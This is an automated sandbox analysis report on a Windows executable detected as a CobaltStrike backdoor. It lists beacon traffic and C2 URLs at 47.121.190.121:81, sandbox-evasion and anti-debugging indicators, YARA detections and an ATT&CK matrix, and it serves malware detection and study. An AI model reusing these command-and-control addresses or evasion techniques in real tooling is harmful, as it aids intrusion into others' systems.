            Source: unknownNetwork traffic detected: HTTP traffic on port 50153 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50153
            Source: unknownNetwork traffic detected: HTTP traffic on port 50154 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50154
            Source: unknownNetwork traffic detected: HTTP traffic on port 50155 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50155
            Source: unknownNetwork traffic detected: HTTP traffic on port 50156 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50156
            Source: unknownNetwork traffic detected: HTTP traffic on port 50157 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50157
            Source: unknownNetwork traffic detected: HTTP traffic on port 50158 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50158
            Source: unknownNetwork traffic detected: HTTP traffic on port 50159 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50159
            Source: unknownNetwork traffic detected: HTTP traffic on port 50160 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50160
            Source: unknownNetwork traffic detected: HTTP traffic on port 50161 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50161
            Source: unknownNetwork traffic detected: HTTP traffic on port 50162 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50162
            Source: unknownNetwork traffic detected: HTTP traffic on port 50163 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50163
            Source: unknownNetwork traffic detected: HTTP traffic on port 50164 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50164
            Source: unknownNetwork traffic detected: HTTP traffic on port 50165 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50165
            Source: unknownNetwork traffic detected: HTTP traffic on port 50166 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50166
            Source: unknownNetwork traffic detected: HTTP traffic on port 50167 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50167
            Source: unknownNetwork traffic detected: HTTP traffic on port 50168 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50168
            Source: unknownNetwork traffic detected: HTTP traffic on port 50169 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50169
            Source: unknownNetwork traffic detected: HTTP traffic on port 50170 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50170
            Source: unknownNetwork traffic detected: HTTP traffic on port 50171 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50171
            Source: unknownNetwork traffic detected: HTTP traffic on port 50172 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50172
            Source: unknownNetwork traffic detected: HTTP traffic on port 50173 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50173
            Source: unknownNetwork traffic detected: HTTP traffic on port 50174 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50174
            Source: unknownNetwork traffic detected: HTTP traffic on port 50175 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50175
            Source: unknownNetwork traffic detected: HTTP traffic on port 50176 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50176
            Source: unknownNetwork traffic detected: HTTP traffic on port 50177 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50177
            Source: unknownNetwork traffic detected: HTTP traffic on port 50178 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50178
            Source: unknownNetwork traffic detected: HTTP traffic on port 50179 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50179
            Source: unknownNetwork traffic detected: HTTP traffic on port 50180 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50180
            Source: unknownNetwork traffic detected: HTTP traffic on port 50181 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50181
            Source: unknownNetwork traffic detected: HTTP traffic on port 50182 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50182
            Source: unknownNetwork traffic detected: HTTP traffic on port 50183 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50183
            Source: unknownNetwork traffic detected: HTTP traffic on port 50184 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50184
            Source: unknownNetwork traffic detected: HTTP traffic on port 50185 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50185
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50185
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50185
            Source: unknownNetwork traffic detected: HTTP traffic on port 50186 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50186
            Source: unknownNetwork traffic detected: HTTP traffic on port 50187 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50187
            Source: unknownNetwork traffic detected: HTTP traffic on port 50188 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50188
            Source: unknownNetwork traffic detected: HTTP traffic on port 50189 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50189
            Source: unknownNetwork traffic detected: HTTP traffic on port 50190 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50190
            Source: unknownNetwork traffic detected: HTTP traffic on port 50191 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50191
            Source: unknownNetwork traffic detected: HTTP traffic on port 50192 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50192
            Source: unknownNetwork traffic detected: HTTP traffic on port 50193 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50193
            Source: unknownNetwork traffic detected: HTTP traffic on port 50194 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50194
            Source: unknownNetwork traffic detected: HTTP traffic on port 50195 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50195
            Source: unknownNetwork traffic detected: HTTP traffic on port 50196 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50196
            Source: unknownNetwork traffic detected: HTTP traffic on port 50197 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50197
            Source: unknownNetwork traffic detected: HTTP traffic on port 50198 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50198
            Source: unknownNetwork traffic detected: HTTP traffic on port 50199 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50199
            Source: unknownNetwork traffic detected: HTTP traffic on port 50200 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50200
            Source: unknownNetwork traffic detected: HTTP traffic on port 50201 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50201
            Source: unknownNetwork traffic detected: HTTP traffic on port 50202 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50202
            Source: unknownNetwork traffic detected: HTTP traffic on port 50203 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50203
            Source: unknownNetwork traffic detected: HTTP traffic on port 50204 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50204
            Source: unknownNetwork traffic detected: HTTP traffic on port 50205 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50205
            Source: unknownNetwork traffic detected: HTTP traffic on port 50206 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50206
            Source: unknownNetwork traffic detected: HTTP traffic on port 50207 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50207
            Source: unknownNetwork traffic detected: HTTP traffic on port 50208 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50208
            Source: unknownNetwork traffic detected: HTTP traffic on port 50209 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50209
            Source: unknownNetwork traffic detected: HTTP traffic on port 50210 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50210
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exeCode function: 0_2_0389E0E8 EncodePointer,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0389E0E8

            Malware Analysis System Evasion

            barindex
            Contains functionality to detect sleep reduction / modifications
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exeCode function: 0_2_03893FA40_2_03893FA4
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exeCode function: 0_2_0388F6540_2_0388F654
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exeWindow / User API: threadDelayed 2012Jump to behavior
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exeWindow / User API: threadDelayed 7740Jump to behavior
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exeEvasive API call chain: GetLocalTime,DecisionNodesgraph_0-32288
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-32372
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exeAPI coverage: 7.4 %
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exeCode function: 0_2_0388F6540_2_0388F654
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exe TID: 6280Thread sleep count: 2012 > 30Jump to behavior
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exe TID: 6280Thread sleep time: -20120000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exe TID: 6304Thread sleep time: -60000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exe TID: 6280Thread sleep count: 7740 > 30Jump to behavior
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exe TID: 6280Thread sleep time: -77400000s >= -30000sJump to behavior
            Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exeCode function: 0_2_0389780C malloc,_snprintf,FindFirstFileA,free,malloc,_snprintf,free,FindNextFileA,FindClose,0_2_0389780C
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exeCode function: 0_2_03890F28 malloc,GetCurrentDirectoryA,FindFirstFileA,GetLastError,free,free,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FindNextFileA,FindClose,0_2_03890F28
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exeThread delayed: delay time: 60000Jump to behavior
            Source: k2vUsu5VZ5.exe, 00000000.00000003.2360519189.0000000000824000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000003.2505423500.0000000000824000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000003.2550753587.0000000000824000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000003.2777722612.0000000000824000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000003.2800732875.0000000000824000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000003.2335439729.0000000000824000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000003.2494439418.0000000000824000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000003.2851774688.0000000000824000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000003.2516505810.0000000000824000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000003.2564353012.0000000000824000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWQ
            Source: k2vUsu5VZ5.exe, 00000000.00000003.2527967708.00000000007DD000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000003.2360519189.0000000000824000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000003.2505423500.0000000000824000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000003.2550753587.0000000000824000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000003.2777722612.0000000000824000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000003.2360519189.00000000007DF000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000003.2800732875.0000000000824000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000003.2335439729.0000000000824000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000003.2550753587.00000000007DD000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000003.2577565149.00000000007DD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exeAPI call chain: ExitProcess graph end nodegraph_0-32354
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exeAPI call chain: ExitProcess graph end nodegraph_0-32053

            Anti Debugging

            barindex
            Found potential dummy code loops (likely to delay analysis)
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exeProcess Stats: CPU usage > 42% for more than 60s
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exeCode function: 0_2_038A69F0 IsDebuggerPresent,__crtUnhandledException,0_2_038A69F0
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exeCode function: 0_2_038A7604 EncodePointer,__crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_038A7604
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exeCode function: 0_2_0040DF90 LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,ExitProcess,0_2_0040DF90
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exeCode function: 0_2_038AE314 VirtualQuery,GetModuleFileNameW,GetPdbDllFromInstallPath,GetProcAddress,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,0_2_038AE314
            Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exeCode function: 0_2_00401180 Sleep,Sleep,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_initterm,GetStartupInfoA,0_2_00401180
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exeCode function: 0_2_00402F69 SetUnhandledExceptionFilter,0_2_00402F69
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exeCode function: 0_2_00401A70 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,0_2_00401A70
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exeCode function: 0_2_038A2384 SetUnhandledExceptionFilter,UnhandledExceptionFilter,UnhandledExceptionFilter,0_2_038A2384
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exeCode function: 0_2_038B04F0 SetUnhandledExceptionFilter,0_2_038B04F0

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Yara detected Powershell download and execute
            Source: Yara matchFile source: Process Memory Space: k2vUsu5VZ5.exe PID: 7148, type: MEMORYSTR
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exeCode function: 0_2_0389BEF0 LogonUserA,GetLastError,ImpersonateLoggedOnUser,GetLastError,0_2_0389BEF0
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exeCode function: 0_2_038B0050 AllocateAndInitializeSid,0_2_038B0050
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exeCode function: 0_2_00401630 CreateNamedPipeA,ConnectNamedPipe,WriteFile,CloseHandle,0_2_00401630
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exeCode function: 0_2_00401990 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_00401990
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exeCode function: 0_2_03894578 GetUserNameA,GetComputerNameA,GetModuleFileNameA,strrchr,GetVersionExA,GetProcAddress,GetModuleHandleA,GetProcAddress,_snprintf,0_2_03894578
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exeCode function: 0_2_03894578 GetUserNameA,GetComputerNameA,GetModuleFileNameA,strrchr,GetVersionExA,GetProcAddress,GetModuleHandleA,GetProcAddress,_snprintf,0_2_03894578
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Remote Access Functionality

            barindex
            Yara detected CobaltStrike
            Source: Yara matchFile source: Process Memory Space: k2vUsu5VZ5.exe PID: 7148, type: MEMORYSTR
            Source: Yara matchFile source: 0.2.k2vUsu5VZ5.exe.3880000.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.k2vUsu5VZ5.exe.3880000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000002.4094451143.0000000000160000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.4095150845.0000000003480000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Yara detected Metasploit Payload
            Source: Yara matchFile source: 00000000.00000002.4094451143.0000000000160000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exeCode function: 0_2_03895100 socket,htons,ioctlsocket,closesocket,bind,listen,0_2_03895100
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exeCode function: 0_2_0389CE10 socket,closesocket,htons,bind,listen,0_2_0389CE10
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exeCode function: 0_2_038B0630 bind,0_2_038B0630
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exeCode function: 0_2_03894CF8 htonl,htons,socket,closesocket,bind,ioctlsocket,0_2_03894CF8

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure2
            Valid Accounts            		2
            Native API            		2
            Valid Accounts            		2
            Valid Accounts            		2
            Valid Accounts            		OS Credential Dumping1
            System Time Discovery            		Remote Services1
            Archive Collected Data            		2
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/Job1
            DLL Side-Loading            		21
            Access Token Manipulation            		112
            Virtualization/Sandbox Evasion            		LSASS Memory241
            Security Software Discovery            		Remote Desktop ProtocolData from Removable Media11
            Non-Standard Port            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            Process Injection            		21
            Access Token Manipulation            		Security Account Manager112
            Virtualization/Sandbox Evasion            		SMB/Windows Admin SharesData from Network Shared Drive2
            Ingress Tool Transfer            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
            DLL Side-Loading            		1
            Process Injection            		NTDS1
            Process Discovery            		Distributed Component Object ModelInput Capture1
            Non-Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
            Obfuscated Files or Information            		LSA Secrets1
            Application Window Discovery            		SSHKeylogging111
            Application Layer Protocol            		Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Software Packing            		Cached Domain Credentials1
            Account Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            DLL Side-Loading            		DCSync1
            System Owner/User Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
            File and Directory Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow4
            System Information Discovery            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            k2vUsu5VZ5.exe79%ReversingLabsWin64.Backdoor.CobaltStrike
            k2vUsu5VZ5.exe100%AviraHEUR/AGEN.1345031
            k2vUsu5VZ5.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://47.121.190.121:81/dot.gifz0%Avira URL Cloudsafe
            http://47.121.190.121:81/dot.gif.121:81/dot.gif-0%Avira URL Cloudsafe
            http://47.121.190.121:81/dot.gif.121:81/dot.gif0%Avira URL Cloudsafe
            http://47.121.190.121:81/dot.gify-0%Avira URL Cloudsafe
            http://47.121.190.121:81/r9dN0%Avira URL Cloudsafe
            http://47.121.190.121:81/dot.gif10%Avira URL Cloudsafe
            http://47.121.190.121/r9dN0%Avira URL Cloudsafe
            http://47.121.190.121:81/dot.gif0%Avira URL Cloudsafe
            http://47.121.190.121:81/dot.gifu0%Avira URL Cloudsafe
            http://47.121.190.121:81/dot.gifP0%Avira URL Cloudsafe
            http://47.121.190.121:81/dot.gif-0%Avira URL Cloudsafe
            http://47.121.190.121:81/dot.gifl0%Avira URL Cloudsafe
            http://47.121.190.121:81/dot.gif.121:81/dot.gif10%Avira URL Cloudsafe
            http://7.121.190.121:81/r9dN0%Avira URL Cloudsafe
            http://47.121.190.121:81/dot.gif120%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            No contacted domains info

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            http://47.121.190.121:81/r9dNtrue
            • Avira URL Cloud: safe
            		unknown
            http://47.121.190.121/r9dNtrue
            • Avira URL Cloud: safe
            		unknown
            http://47.121.190.121:81/dot.giftrue
            • Avira URL Cloud: safe
            		unknown
            http://7.121.190.121:81/r9dNtrue
            • Avira URL Cloud: safe
            		unknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://47.121.190.121:81/dot.gif.121:81/dot.gif-k2vUsu5VZ5.exe, 00000000.00000003.2539034895.0000000000801000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://47.121.190.121:81/dot.gifzk2vUsu5VZ5.exe, 00000000.00000003.2505423500.00000000007F9000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://47.121.190.121:81/dot.gif.121:81/dot.gifk2vUsu5VZ5.exe, 00000000.00000003.2360519189.000000000080B000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000003.2347746904.000000000080B000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000003.2335439729.000000000080B000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://47.121.190.121:81/dot.gify-k2vUsu5VZ5.exe, 00000000.00000002.4094719689.00000000007F9000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://47.121.190.121:81/dot.gifuk2vUsu5VZ5.exe, 00000000.00000003.2516505810.0000000000801000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000003.2347746904.000000000080B000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000003.2483467740.0000000000801000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000002.4094875365.000000000080B000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://47.121.190.121:81/dot.gifPk2vUsu5VZ5.exe, 00000000.00000003.2527967708.0000000000801000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000003.2577565149.0000000000801000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000003.2516505810.0000000000801000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000003.2800732875.000000000080B000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000003.2459856839.000000000080B000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000003.2839564905.000000000080B000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000003.2360519189.000000000080B000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000003.2788807808.000000000080B000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000003.2777722612.000000000080B000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000003.2550753587.0000000000801000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000003.2564353012.0000000000801000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000003.1974275008.000000000080B000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://47.121.190.121:81/dot.gif1k2vUsu5VZ5.exe, 00000000.00000003.2527967708.0000000000801000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000003.2516505810.0000000000801000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000003.2505423500.0000000000801000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000003.2788807808.000000000080B000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000003.2483467740.0000000000801000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000003.2539034895.0000000000801000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000003.2777722612.000000000080B000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000003.2550753587.0000000000801000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://47.121.190.121:81/dot.giflk2vUsu5VZ5.exe, 00000000.00000003.1974275008.000000000080B000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://47.121.190.121:81/dot.gif-k2vUsu5VZ5.exe, 00000000.00000003.2516505810.0000000000801000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000003.2800732875.000000000080B000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000003.2459856839.000000000080B000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000003.2505423500.0000000000801000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000003.2788807808.000000000080B000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000003.2777722612.000000000080B000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://47.121.190.121:81/dot.gif.121:81/dot.gif1k2vUsu5VZ5.exe, 00000000.00000003.2564353012.0000000000801000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://127.0.0.1:%u/k2vUsu5VZ5.exe, 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmpfalse
              		high
